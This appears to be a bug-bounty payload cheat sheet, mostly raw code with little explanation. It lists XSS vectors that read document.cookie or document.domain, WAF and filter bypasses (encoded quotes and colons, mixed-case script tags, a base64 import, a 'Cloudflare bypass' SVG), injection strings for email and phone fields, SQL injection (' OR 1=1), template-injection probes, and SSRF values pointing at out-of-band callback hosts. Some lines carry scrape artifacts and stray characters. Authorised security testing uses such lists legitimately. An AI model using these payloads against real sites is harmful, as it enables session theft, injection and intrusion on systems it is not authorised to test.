xss 1

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

  1. bypass block of single quote '?url=home%26apos;-alert(1)//onclick="location='/home'-alert(1)//'"

  2. bypass block of colon :?url=javascript%26colon;alert(1)href="javascript:alert(1)”

</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/

<image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src>

#"></div><a href= javascript:alert(document.domain)

/?url=http://me6.com/aem/xss2.svgarrow-up-right

/;/;/resource/md/get/url?url=http://oast.proarrow-up-right

\u003e\u003cimg src=1

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

onerror=alert(9)\u003e

AutoFocus/>/OnFocus=top?."ale"+"rt"arrow-up-right/

<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

❌<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)

automated xss <img/src="x"/onerror=prompt()>

' OR 1=1 ​

login email

["');alert('XSS');//"]@xyz.xxx

test@gmail.com%27%22%3E%3Csvg/onload=alert(/xss/)%3E

12345-abc-1-23456<script>alert(document.cookie)<%2Fscript>.img

phone no field xss

XSs - +441134960000;phone-context=alert(0)

Parameter pollution (1) - +441134960000;phone-context=&phone-context=+442..

Parameter pollution (2) - +441134960000;ext=1;ext=?

SQL injection +441134960000;phone-context=' OR 1=1; --

Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{77}{7*’7}

SSRF +441134960000;phone-context=http://burocoaborator.net

Twitter famous

HackerOne report to find xss

%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E http://host/path/to/image'onerror=alert(1);//.png

c panel

Last updated